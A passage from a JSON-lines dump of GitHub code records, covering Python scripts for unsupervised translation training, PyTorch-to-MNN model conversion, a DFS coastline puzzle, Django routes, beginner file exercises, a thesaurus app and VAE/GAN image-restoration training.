initialTranslation = read_mono(args.initial)\n\n # trim sets\n maxLen = min([len(dataf), len(datat), len(initialTranslation)])\n dataf = dataf[:maxLen]\n datat = datat[:maxLen]\n initialTranslation = initialTranslation[:maxLen]\n\n # temporary\n # num = 500\n # dataf = dataf[:num]\n # datat = datat[:num]\n # initialTranslation = initialTranslation[:num]\n\n # Create vocabularies\n fvocab = Vocab()\n tvocab = Vocab()\n for fwords in dataf:\n fvocab |= fwords\n for twords in datat:\n tvocab |= twords\n\n # Create initial translation models\n # Do we need to update vocabs?\n target_to_foreign = Model(tvocab, 64, fvocab)\n foreign_to_target = Model(fvocab, 64, tvocab) # try increasing 64 to 128 or 256\n\n else:\n print('error: foreign data, target data, and rough initial translation all required', file=sys.stderr)\n sys.exit()\n\n if args.initial and not args.outfile:\n print('error: -o is required', file=sys.stderr)\n sys.exit()\n\n # start training\n if args.dataf and args.initial and args.datat:\n\n print(\"Starting to train\")\n # set variables\n numIterations = 5 if not args.iterations else int(args.iterations)\n numEpochs = 3 if not args.epochs else int(args.epochs)\n\n # declare optimizers\n opt_tf = torch.optim.Adam(target_to_foreign.parameters(), lr=0.0003)\n opt_ft = torch.optim.Adam(foreign_to_target.parameters(), lr=0.0003)\n\n # initialize data\n targetPred = initialTranslation\n percentTrain = 0.9 if not args.percentTrain else float(args.percentTrain)\n\n best_dev_loss1 = None\n best_dev_loss2 = None\n\n for iteration in range(numIterations):\n\n # train target to foreign\n print(f'Iteration {iteration+1}/{numIterations}, Target to Foreign:')\n # set data, need the lines in all the data to correspond\n predTargetTrain, predTargetTest, foreignTrain, foreignTest, targetTrain, targetTest = train_test_split(targetPred, dataf, datat, test_size=1-percentTrain)\n predTargetDev, predTargetTest, foreignDev, foreignTest, targetDev, targetTest = train_test_split(predTargetTest, foreignTest, targetTest, test_size=0.5)\n\n for epoch in range(numEpochs):\n epochstartTime = time.time()\n print(f' Epoch {epoch+1}/{numEpochs}:')\n # train model, should be pred training toward the actual foreign language\n target_to_foreign, opt_tf = trainModel(target_to_foreign, opt_tf, predTargetTrain, foreignTrain)\n\n # validate dev, should be the dif type of words, so target --> foreign\n dev_loss = validateDev(target_to_foreign, predTargetDev, foreignDev)\n if best_dev_loss1 is None or dev_loss < best_dev_loss1:\n best_model_tf = copy.deepcopy(target_to_foreign)\n if args.savetf:\n torch.save(target_to_foreign, args.savetf)\n\n ### Translate test set if good dev scoring\n if args.outfile:\n outputTest(target_to_foreign, args.outfile, predTargetTest, 'foreign', dev_loss)\n\n best_dev_loss1 = dev_loss\n # update model\n target_to_foreign = best_model_tf\n\n # train foreign to target\n print(f'Iteration {iteration+1}/{numIterations}, Foreign to Target:')\n # set data\n foreignPred = outputPred(target_to_foreign, targetPred)\n predForeignTrain, predForeignTest, foreignTrain, foreignTest, targetTrain, targetTest = train_test_split(foreignPred, dataf, datat, test_size=1-percentTrain)\n predForeignDev, predForeignTest, foreignDev, foreignTest, targetDev, targetTest = train_test_split(predForeignTest, foreignTest, targetTest, test_size=0.5)\n\n for epoch in range(numEpochs):\n print(f' Epoch {epoch+1}/{numEpochs}:')\n epochstartTime = time.time()\n # train model, should be pred training toward the actual target language\n foreign_to_target, opt_ft = trainModel(foreign_to_target, opt_ft, predForeignTrain, targetTrain)\n\n # validate dev, should be the dif type of words, so pred foreign --> actual target\n dev_loss = validateDev(foreign_to_target, predForeignDev, targetDev)\n if best_dev_loss2 is None or dev_loss < best_dev_loss2:\n best_model_ft = copy.deepcopy(foreign_to_target)\n if args.saveft:\n torch.save(foreign_to_target, args.saveft)\n\n ### Translate test set if good dev scoring\n if args.outfile:\n outputTest(foreign_to_target, args.outfile, predForeignTest, 'target', dev_loss)\n\n best_dev_loss2 = dev_loss\n # update model\n foreign_to_target = best_model_ft\n\n # update next iteration data\n targetPred = outputPred(foreign_to_target, foreignPred)\n\n print(f'Time left to complete: { (time.time() - totalstarttime) * (numIterations - 1 - iteration) }')\n","repo_name":"kekoawong/UnsupervisedLanguageTranslation","sub_path":"unsupervisedTranslation.py","file_name":"unsupervisedTranslation.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20013393818","text":"import json\nimport logging\nimport subprocess\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\n\ncache_path = \"../../cloud/aggregation/cache/\"\nscript_path = \"../../../scripts/\"\n\n\ndef build_simple_linear(args):\n return torch.nn.Sequential([\n torch.nn.Flatten(),\n torch.nn.Linear(np.prod(args.input_shape), args.num_classes),\n torch.nn.Softmax(dim=1)\n ])\n\n\n_models = {\n 'linear': build_simple_linear,\n}\n\n\ndef get_mnn_model(name: str, args):\n if name not in _models:\n raise ValueError(f\"Unsupported model: {name}\")\n return _models[name](args)\n\n\ndef init_keymap(model_weights: dict) -> dict:\n \"\"\"\n Match keys from mnn to torch.\n\n MNN do not support mnn->torch conversion \n and do not keep keys inside state_dict when converted from torch model.\n\n MNN can be converted to JSON, which has a list of operations.\n Some operations have trainable parameters.\n All operations have a type.\n\n We currently support getting the key map of \n two types of operations which have trainable operations:\n 1. Convolution: weight, bias.\n 2. BatchNorm: slopeData, meanData, varData, biasData.\n This method initialize keymap as \n idx: an unsigned integer representing the index of\n the operation inside oplist which has trainable parameters.\n ->\n (\n key : a string representing the key of state_dict.\n type : a string representing the type of the operation in MNN.\n \"Convolution\"|\"BatchNorm\"\n shape : a tuple representing the original shape in torch.\n has_bias: a bool representing whether the operation has bias.\n ).\n Example: 4->(\"linear\", \"Convolution\", (10, 2352)), True)\n\n Args:\n model_weights (dict): PyTorch model weights in state_dict.\n\n Returns:\n dict: MNN oplist index -> PyTorch state_dict key map.\n \"\"\"\n # load converted JSON file to mnn_json\n subprocess.call([\n f\"{script_path}MNNDump2Json\",\n f\"{cache_path}model.mnn\",\n f\"{cache_path}model.json\"])\n with open('../../cloud/aggregation/cache/model.json') as f:\n mnn_json = json.load(f)\n keymap = {}\n torch_keys = set()\n for key in model_weights.keys():\n torch_keys.add('.'.join(key.split('.')[:-1]))\n for idx, op in enumerate(mnn_json[\"oplists\"]):\n if \"Convolution\" in op[\"type\"]:\n for key in torch_keys:\n if f'{key}.weight' in model_weights.keys():\n mnn_weight = torch.tensor(op['main']['weight'])\n torch_weight = model_weights[f'{key}.weight']\n torch_weight_flat = torch_weight.reshape(-1)\n if mnn_weight.shape == torch_weight_flat.shape and (\n mnn_weight - torch_weight_flat).max() < 1e-4:\n keymap[idx] = (\n key, \"Convolution\", tuple(torch_weight.shape),\n f'{key}.bias' in model_weights.keys())\n torch_keys.remove(key)\n break\n elif op[\"type\"] == \"BatchNorm\":\n for key in torch_keys:\n if f'{key}.weight' in model_weights.keys():\n mnn_weight = torch.tensor(op['main']['slopeData'])\n torch_weight = model_weights[f'{key}.weight']\n if mnn_weight.shape == torch_weight.shape and (\n mnn_weight - torch_weight).max() < 1e-4:\n keymap[idx] = (\n key, \"BatchNorm\", tuple(torch_weight.shape), True)\n torch_keys.remove(key)\n break\n return keymap\n\n\ndef torch_to_mnn(model, input_shape: Tensor):\n \"\"\"Convert torch model to mnn binary.\n\n Args:\n model (Module): Pytorch model to be converted.\n input_shape (Tensor): Shape of input to the model.\n\n Returns:\n JSON object: MNN model in JSON format.\n \"\"\"\n # PyTorch -> ONNX\n input_data = torch.randn(input_shape)\n input_names = [\"input\"]\n output_names = [\"output\"]\n Path(cache_path).mkdir(exist_ok=True)\n torch.onnx.export(\n model, input_data, f\"{cache_path}model.onnx\", verbose=True,\n training=torch.onnx.TrainingMode.TRAINING, do_constant_folding=False,\n input_names=input_names, output_names=output_names)\n\n # ONNX -> MNN\n subprocess.call([\n f\"{script_path}MNNConvert\", \"-f\", \"ONNX\", \"--modelFile\",\n f\"{cache_path}model.onnx\", \"--MNNModel\", f\"{cache_path}model.mnn\", \"--forTraining\"])\n\n return Path(f'{cache_path}model.mnn').read_bytes()\n\n\ndef mnn_to_torch(keymap: dict, mnn_model_binary: bytes, client_id: str):\n \"\"\"\n Extract trainable parameters from mnn json.\n Then convert it to state_dict, matching pytorch model.\n Args:\n keymap (dict): Key map from MNN oplist index to PyTorch state_dict key.\n data (JSON object): MNN model in JSON.\n Returns:\n dict: Returned the converted state_dict.\n \"\"\"\n Path(f'{cache_path}{client_id}.mnn').write_bytes(mnn_model_binary)\n subprocess.call([\n f\"{script_path}MNNDump2Json\",\n f\"{cache_path}{client_id}.mnn\",\n f\"{cache_path}{client_id}.json\"\n ])\n data = json.load(f\"{cache_path}{client_id}.json\")\n Path(f'{cache_path}{client_id}.mnn').unlink()\n Path(f'{cache_path}{client_id}.json').unlink()\n state_dict = {}\n for idx, val in keymap.items():\n key, mnn_type, shape, has_bias = val\n if mnn_type == 'Convolution':\n state_dict[f'{key}.weight'] = np.asarray(\n data['oplists'][idx]['main']['weight'],\n dtype=np.float32).reshape(shape)\n if has_bias:\n state_dict[f'{key}.bias'] = np.asarray(\n data['oplists'][idx]['main']['bias'],\n dtype=np.float32)\n elif mnn_type == 'BatchNorm':\n state_dict[f'{key}.weight'] = np.asarray(\n data['oplists'][idx]['main']['slopeData'],\n dtype=np.float32)\n state_dict[f'{key}.bias'] = np.asarray(\n data['oplists'][idx]['main']['biasData'],\n dtype=np.float32)\n state_dict[f'{key}.running_mean'] = np.asarray(\n data['oplists'][idx]['main']['meanData'],\n dtype=np.float32)\n state_dict[f'{key}.running_var'] = np.asarray(\n data['oplists'][idx]['main']['varData'],\n dtype=np.float32)\n else:\n logging.ERROR(f\"Unsupported MNN Type: {mnn_type}\")\n return state_dict\n","repo_name":"SymbioticLab/FedScale","sub_path":"fedscale/utils/models/mnn_model_provider.py","file_name":"mnn_model_provider.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"44"} +{"seq_id":"41438993646","text":"\"\"\"\n단위 정육각형 이루어져 있는 지도가 주어졌을 때, \n해변의 길이를 구하는 프로그램을 작성하시오.\n\n해변은 정육각형의 변 중에서 한 쪽은 물인데, 한 쪽은 땅인 곳을 의미한다.\n\n첫째 줄에 지도의 세로 크기 N과 가로 크기 M이 주어진다. (1 ≤ N, M ≤ 50)\n둘째 줄부터 N개의 줄에 지도가 주어진다. '.'은 물, '#'은 땅이다.\n\"\"\"\n\ndef dfs(x, y):\n global result \n if x >= N or x < 0 or y >= M or y < 0: # 범위 밖 확인\n return False\n\n if beach[x][y] == '.':\n beach[x][y] = 1 # 현재 노드 방문\n\n # 상, 하, 좌, 우 확인\n dfs(x+1, y)\n dfs(x-1, y)\n dfs(x, y-1)\n dfs(x, y+1)\n\n return True\n\n if beach[x][y] == '#':\n result += 1\n return False\n\nN, M = map(int, input().split())\nbeach = []\n\nfor _ in range(N):\n beach.append(list(input()))\n\nresult = 0\n\nfor i in range(N):\n for j in range(M):\n if dfs(i, j):\n result += 1\n\nprint(result)\n","repo_name":"honge7694/algorithm","sub_path":"baekjoon/14397_해변_X.py","file_name":"14397_해변_X.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39564034148","text":"\"\"\"\r\nThe Self-Taught Programmer - Chapter 8 Files\r\nAuthor: Dante Valentine\r\nDate: 4 June, 2021\r\n\"\"\"\r\n\r\n# CHALLENGE 1 (Print contents of a document already on computer)\r\nimport os\r\ndojotext = os.path.join(\"C:\\\\\",\"Users\", \"Toi\", \"Desktop\", \"Python\", \"dojo.txt\")\r\ndojotext2 = os.path.join(\"C:\\\\\",\"Users\", \"Toi\", \"Desktop\", \"Python\", \"dojo2.txt\")\r\n\r\ndojo = open(dojotext,\"r\")\r\nprint(dojo.read())\r\ndojo.close()\r\n\r\nwith open(dojotext2, \"r\") as f:\r\n print(f.read())\r\n\r\n# CHALLENGE 2 (write a program that asks user a question and saves answer to a file)\r\ndatadoc = \"datadoc.txt\"\r\nfname = input(\"What is your first name?\\n > \")\r\n\r\nwith open(datadoc, \"w\") as f:\r\n f.write(fname)\r\n\r\n# CHALLENGE 3 (Take items in the given list of lists and write to a csv with data from each list in its own row)\r\nimport csv\r\nlistcsv = \"listcsv.csv\"\r\n\r\ngivenlist = [[\"Top Gun\", \"Risky Business\", \"Minority Report\"],[\"Titanic\", \"The Revenant\", \"Inception\"],[\"Training Day\", \"Man on Fire\", \"Flight\"]]\r\nwith open(\"listcsv\", \"w\") as f:\r\n w = csv.writer(f, delimiter=\",\")\r\n w.writerow(givenlist[0])\r\n w.writerow(givenlist[1])\r\n w.writerow(givenlist[2])\r\n\r\n","repo_name":"spicydojoroll/tstp_challenges","sub_path":"TSTP_20210604_CH9_Files.py","file_name":"TSTP_20210604_CH9_Files.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21200020244","text":"from django.urls import path\nfrom app import views\n\nurlpatterns = [\n # auth\n path('', views.login, name = 'login'),\n path('register', views.register, name = 'register'),\n path('logout', views.logout, name = 'logout'),\n # home page\n path('mobify/', views.index, name = 'index'),\n # product, product detail, cart\n path('mobify/product//', views.product, name = 'product'),\n path('mobify/product//detail', views.productDetail, name = 'product_detail'),\n path('mobify/cart', views.cart, name = 'cart'),\n path('mobify/profile/', views.profile, name = 'profile'),\n # add cart, remove cart\n path('mobify/add-cart', views.addCart, name = 'add_cart'),\n path('mobify/remove-cart', views.removeCart, name = 'remove_cart'),\n path('mobify/remove-review', views.removeReivew, name = 'remove_review'),\n]\n","repo_name":"Rahgul007/mobify_ecom","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6696053949","text":"import time\nimport functools\n\n\ndef log_decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n\n with open(\"logs/log.txt\", \"a\") as log_file:\n log_file.write(f\"Function {func.__name__} started at {time.ctime(start_time)}\\n\")\n\n res = func(*args, **kwargs)\n end_time = time.time()\n duration = end_time - start_time\n\n with open(\"logs/log.txt\", \"a\") as log_file:\n log_file.write(f\"Function {func.__name__} finished at {time.ctime(end_time)}\\n\")\n log_file.write(f\"Function {func.__name__} took {duration:.2f} seconds to execute.\\n\")\n return res\n\n return wrapper\n","repo_name":"MaxKosPy/Beetroot_telegram_bot","sub_path":"logs/save_logs.py","file_name":"save_logs.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28792335341","text":"import googlemaps\nfrom GolfConnect.settings import GOOGLE_MAP_API_KEY\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\n\n\n__author__ = 'toantran'\n\n\ndef get_client_ip(request):\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n return ip\n\n\ndef paginate_query(query, page, item):\n paginator = Paginator(query, item)\n try:\n paginate = paginator.page(page)\n except PageNotAnInteger:\n paginate = paginator.page(1)\n except EmptyPage:\n paginate = paginator.page(paginator.num_pages)\n return paginate\n\n\ndef get_distance(origins, destionations):\n gmaps = googlemaps.Client(key=GOOGLE_MAP_API_KEY)\n return gmaps.distance_matrix(origins, destionations)","repo_name":"minhdo6487/api-proto","sub_path":"utils/rest/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40932622842","text":"import json\nimport difflib\n#from difflib import SequenceMatcher\nfrom difflib import get_close_matches\n\ndata = json.load(open(\"data.json\"))\n\ndef translate(word):\n word = word.lower()\n if word in data:\n return data[word]\n elif word.title() in data:\n return data[word.title()]\n elif word.upper() in data:\n return data[word.upper()]\n #elif (SequenceMatcher(None,word,\"rain\").ratio() > 0.8):\n # return data[\"rain\"]\n elif ( len(get_close_matches(word,data.keys())) > 0 ):\n word1 = get_close_matches(word,data.keys())[0]\n x = input(\"Did you mean %s instead? Enter Y is yes, or N if no: \" % word1)\n x = x.upper()\n if x == \"Y\":\n return data[word1]\n elif x==\"N\":\n return \"Thw word doesn't exist....Please double check it.\"\n else:\n return \"We dint understand your entry.\"\n else:\n return \"Thw word doesn't exist....Please double check it.\"\n\n\nword = input(\"Enter the word: \")\n\noutput = translate(word) \n\nif type(output) == list:\n for item in output:\n print(item)\nelse:\n print(output)","repo_name":"balajibhaskar11/English-Thesaurus","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1346254667","text":"import torch\nimport torch.nn.functional as F\nfrom Global import models\n\nfrom Global.models import networks\nfrom Global.models import mapping_model\nimport itertools\nimport torchvision\n\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image as IMG\nfrom torchvision import transforms as tmf\nfrom Global.options.test_options import TestOptions\n\n\nclass CelebDataset(Dataset):\n def __init__(self, **kw):\n self.images_dir = kw.get('images_dir')\n self.images = os.listdir(self.images_dir)\n self.images = self.images[:kw.get('lim', len(self.images))]\n self.image_size = kw.get('image_size', 64)\n\n def __getitem__(self, index):\n file = self.images[index]\n img = self.transforms(IMG.open(self.images_dir + os.sep + file))\n return {'input': img}\n \n def __len__(self):\n return len(self.images)\n\n @property\n def transforms(self):\n return tmf.Compose(\n [tmf.Resize(self.image_size), tmf.CenterCrop(self.image_size),\n tmf.ToTensor(), tmf.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n### lsgan: a=0, b=c=1\ndef lsgan_d(d_logit_real, d_logit_fake):\n return F.mse_loss(d_logit_real, torch.ones_like(d_logit_real)) + d_logit_fake.pow(2).mean()\n\ndef lsgan_g(d_logit_fake):\n return F.mse_loss(d_logit_fake, torch.ones_like(d_logit_fake))\n\n\ndef build_model(opt):\n \"\"\" stage 1.1 train 2 vae \"\"\"\n # TODO stage 1.2 train mapping network\n print(\"build 2 vae and a transfer network\")\n model = mapping_model.Pix2PixHDModel_Mapping()\n model.initialize(opt)\n\n ##### define networks\n print(\"build vae1 and vae2 ...\")\n vae1 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n vae2 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n vae1.apply(networks.weights_init)\n vae2.apply(networks.weights_init)\n print(\"build vae1 and vae2 finish!\")\n print(\"build D ...\")\n xr_recon_d = networks.Z_xr_Discriminator(input_nc=3, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n z_xr_d = networks.Z_xr_Discriminator(input_nc=opt.feat_dim, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n y_recon_d =networks.Z_xr_Discriminator(input_nc=3, ndf=opt.disc_ch, n_layers=opt.disc_layers).to(opt.device)\n print(\"build D finish\")\n \"\"\" Optim \"\"\"\n optimizer_vae1 = torch.optim.Adam(vae1.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_d1 = torch.optim.Adam(itertools.chain(xr_recon_d.parameters(), z_xr_d.parameters()),lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_vae2 = torch.optim.Adam(vae2.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n optimizer_d2 = torch.optim.Adam(y_recon_d.parameters(), lr=opt.lr, betas=(0.5, 0.999), weight_decay=0, eps=1e-6)\n return vae1, xr_recon_d, z_xr_d, vae2, y_recon_d, optimizer_vae1, optimizer_d1, optimizer_vae2, optimizer_d2\n\n# build 2 vae network, 3 discriminators but NO transfer network for now\n# and their optimizer\n\n\ncelebdataset = CelebDataset(images_dir='/data/akhanal1/img_align_celeba', lim=100)\ndataloader = DataLoader(dataset=celebdataset, batch_size=4, pin_memory=True, num_workers=4)\n\nbatch = next(dataloader.__iter__())\nprint(batch['input'].shape)\n\nsys.exit()\nopt = TestOptions().parse(save=False)\nparameter_set(opt)\n\n\n# self.parser.add_argument(\"--batchSize\", type=int, default=1, help=\"input batch size\")\n# self.parser.add_argument(\"--loadSize\", type=int, default=1024, help=\"scale images to this size\")\n# self.parser.add_argument(\"--fineSize\", type=int, default=512, help=\"then crop to this size\")\n# self.parser.add_argument(\"--label_nc\", type=int, default=35, help=\"# of input label channels\")\n# self.parser.add_argument(\"--input_nc\", type=int, default=3, help=\"# of input image channels\")\n# self.parser.add_argument(\"--output_nc\", type=int, default=3, help=\"# of output image channels\")\nvae1 = networks.GlobalGenerator_DCDCv2(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.k_size,\n opt.n_downsample_global,\n networks.get_norm_layer(norm_type=opt.norm),\n opt=opt,\n )\n\nvae1, xr_recon_d, z_xr_d, vae2, y_recon_d, optimizer_vae1, optimizer_d1, optimizer_vae2, optimizer_d2 = build_model(opt)\nstart_iter = 0\nif opt.load_checkpoint_iter>0:\n checkpoint_path = checkpoint_root + f'/global_checkpoint_{opt.load_checkpoint_iter}.pth'\n if not Path(checkpoint_path).exists():\n print(f\"ERROR! checkpoint_path {checkpoint_path} is None\")\n exit(-1)\n state_dict = torch.load(checkpoint_path)\n start_iter = state_dict['iter']\n assert state_dict['batch_size'] == opt.batch_size, f\"ERROR - batch size changed! load: {state_dict['batch_size']}, but now {opt.batch_size}\"\n vae1.load_state_dict(state_dict['vae1'])\n xr_recon_d.load_state_dict(state_dict['xr_recon_d'])\n z_xr_d.load_state_dict(state_dict['z_xr_d'])\n vae2.load_state_dict(state_dict['vae2'])\n y_recon_d.load_state_dict(state_dict['y_recon_d'])\n optimizer_vae1.load_state_dict(state_dict['optimizer_vae1'])\n optimizer_d1.load_state_dict(state_dict['optimizer_d1'])\n optimizer_vae2.load_state_dict(state_dict['optimizer_vae2']) \n optimizer_d2.load_state_dict(state_dict['optimizer_d2']) \n print(\"checkpoint load successfully!\")\n# create dataloader\ndataLoaderR, dataLoaderXY = get_dataloader(opt)\ndataLoaderXY_iter = iter(dataLoaderXY)\ndataLoaderR_iter = iter(dataLoaderR)\nstart = time.perf_counter()\nprint(\"train start!\")\nfor ii in range(opt.total_iter - start_iter):\n current_iter = ii + start_iter\n try:\n x, y, path_y = dataLoaderXY_iter.next()\n except:\n dataLoaderXY_iter = iter(dataLoaderXY)\n x, y, path_y = dataLoaderXY_iter.next()\n try:\n r, path_r = dataLoaderR_iter.next()\n except:\n dataLoaderR_iter = iter(dataLoaderR)\n r, path_r = dataLoaderR_iter.next()\n ### following the practice in U-GAT-IT:\n ### train D and G iteratively, but not training D multiple times than training G\n r = r.to(opt.device)\n x = x.to(opt.device)\n y = y.to(opt.device)\n if opt.debug and current_iter%500==0:\n torchvision.utils.save_image(y, 'train_vae_y.png', normalize=True)\n torchvision.utils.save_image(x, 'train_vae_x.png', normalize=True)\n torchvision.utils.save_image(r, 'train_vae_r.png', normalize=True)\n\n ### vae1 train d\n # save gpu memory since no need calc grad for net G when train net D\n with torch.no_grad():\n z_x, mean_x, var_x, recon_x = vae1(x)\n z_r, mean_r, var_r, recon_r = vae1(r)\n batch_requires_grad(z_x, mean_x, var_x, recon_x,z_r, mean_r, var_r, recon_r)\n loss_1 = 0\n adv_loss_d_x = lsgan_d(xr_recon_d(x), xr_recon_d(recon_x))\n adv_loss_d_r = lsgan_d(xr_recon_d(r), xr_recon_d(recon_r))\n # z_x is real and z_r is fake here because let z_r close to z_x\n adv_loss_d_xr = lsgan_d(z_xr_d(z_x), z_xr_d(z_r))\n loss_1_d = adv_loss_d_x + adv_loss_d_r + adv_loss_d_xr\n loss_1_d.backward()\n optimizer_d1.step()\n optimizer_d1.zero_grad()\n ### vae1 train g\n # since we need update weights of G, the result should be re-calculate with grad\n z_x, mean_x, var_x, recon_x = vae1(x)\n z_r, mean_r, var_r, recon_r = vae1(r)\n adv_loss_g_x = lsgan_g(xr_recon_d(recon_x))\n adv_loss_g_r = lsgan_g(xr_recon_d(recon_r))\n # z_x is real and z_r is fake here because let z_r close to z_x\n adv_loss_g_xr = lsgan_g(z_xr_d(z_r))\n KLDloss_1_x = -0.5 * torch.sum(1 + var_x - mean_x.pow(2) - var_x.exp()) # KLD\n L1loss_1_x = opt.weight_alpha * F.l1_loss(x, recon_x)\n KLDloss_1_r = -0.5 * torch.sum(1 + var_r - mean_r.pow(2) - var_r.exp()) # KLD\n L1loss_1_r = opt.weight_alpha * F.l1_loss(r, recon_r)\n loss_1_g = adv_loss_g_x + KLDloss_1_x + L1loss_1_x + adv_loss_g_r + KLDloss_1_r + L1loss_1_r + adv_loss_g_xr\n loss_1_g.backward()\n optimizer_vae1.step()\n optimizer_vae1.zero_grad()\n\n ### vae2 train d\n # save gpu memory since no need calc grad for net G when train net D\n with torch.no_grad():\n z_y, mean_y, var_y, recon_y = vae2(y)\n batch_requires_grad(z_y, mean_y, var_y, recon_y)\n adv_loss_d_y = lsgan_d(y_recon_d(y), y_recon_d(recon_y))\n loss_2_d = adv_loss_d_y\n loss_2_d.backward()\n optimizer_d2.step()\n optimizer_d2.zero_grad()\n ### vae2 train g\n # since we need update weights of G, the result should be re-calculate with grad\n z_y, mean_y, var_y, recon_y = vae2(y)\n adv_loss_g_y = lsgan_g(y_recon_d(recon_y))\n KLDloss_1_y = -0.5 * torch.sum(1 + var_y - mean_y.pow(2) - var_y.exp()) # KLD\n L1loss_1_y = opt.weight_alpha * F.l1_loss(y, recon_y)\n loss_2_g = adv_loss_g_y + KLDloss_1_y + L1loss_1_y\n loss_2_g.backward()\n optimizer_vae2.step()\n optimizer_vae2.zero_grad()\n # debug\n if opt.debug and current_iter%500==0:\n # [print(k, 'channel 0:\\n', v[0][0]) for k,v in list(model.named_parameters()) if k in [\"netG_A.encoder.13.conv_block.5.weight\", \"netG_A.decoder.4.conv_block.5.weight\"]]\n torchvision.utils.save_image(recon_x, 'train_vae_recon_x.png', normalize=True)\n torchvision.utils.save_image(recon_r, 'train_vae_recon_r.png', normalize=True)\n torchvision.utils.save_image(recon_y, 'train_vae_recon_y.png', normalize=True)\n \n if current_iter%500==0:\n print(f\"\"\"STEP {current_iter:06d} {time.perf_counter() - start:.1f} s\n loss_1_d = adv_loss_d_x + adv_loss_d_r + adv_loss_d_xr\n {loss_1_d:.3f} = {adv_loss_d_x:.3f} + {adv_loss_d_r:.3f} + {adv_loss_d_xr:.3f}\n loss_1_g = adv_loss_g_x + KLDloss_1_x + L1loss_1_x + adv_loss_g_r + KLDloss_1_r + L1loss_1_r + adv_loss_g_xr\n {loss_1_g:.3f} = {adv_loss_g_x:.3f} + {KLDloss_1_x:.3f} + {L1loss_1_x:.3f} + {adv_loss_g_r:.3f} + {KLDloss_1_r:.3f} + {L1loss_1_r:.3f} + {adv_loss_g_xr:.3f}\n \"\"\")\n if (current_iter+1)%2000==0:\n # finish the current_iter-th step, e.g. finish iter0, save as 1, resume train from iter 1\n state = {\n 'iter': current_iter,\n 'batch_size': opt.batch_size,\n #\n 'vae1': vae1.state_dict(),\n 'xr_recon_d': xr_recon_d.state_dict(),\n 'z_xr_d': z_xr_d.state_dict(),\n #\n 'vae2': vae2.state_dict(),\n 'y_recon_d': y_recon_d.state_dict(),\n #\n 'optimizer_vae1': optimizer_vae1.state_dict(),\n 'optimizer_d1': optimizer_d1.state_dict(),\n 'optimizer_vae2': optimizer_vae2.state_dict(),\n 'optimizer_d2': optimizer_d2.state_dict(),\n }\n torch.save(state, checkpoint_root + f'/global_checkpoint_{current_iter}.pth')\nprint(\"global\", time.perf_counter() - start, ' s')","repo_name":"jmandivarapu1/ReconImages","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21643531135","text":"from app import db\n\n\nclass RoleGrant(db.Model):\n __tablename__ = 'rolegrant'\n id = db.Column(db.Integer, primary_key=True)\n role_id = db.Column(db.Integer, db.ForeignKey('role.id'))\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n granted_user_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n device_id = db.Column(db.Integer, db.ForeignKey('device.id'))\n\n def __repr__(self):\n return ''.format(\n user=self.granted_user.username,\n role=self.role.roleid,\n device=self.device.deviceid\n )\n","repo_name":"FanapSoft/FANAP-IoT-Core-Platform","sub_path":"app/model/rolegrant.py","file_name":"rolegrant.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"19206853900","text":"\"\"\"เค้กช็อกโกแลต\"\"\"\r\ndef main():\r\n \"\"\"Print จำนวนเค้กที่ซื้อได้,เงินทอน\"\"\"\r\n budget = int(input())\r\n cost = int(input()) # ราคาเค้กต่อ1ชิ้น\r\n change = budget - cost\r\n if change >= 0:\r\n getcake = budget // cost\r\n print(\"Chocolate Cake: %d\" %(getcake))\r\n print(\"Money left: \"+ str(budget - (getcake * cost)))\r\n elif change < 0:\r\n print(\"Not enough money;(\")\r\n print(\"Money left: \"+ 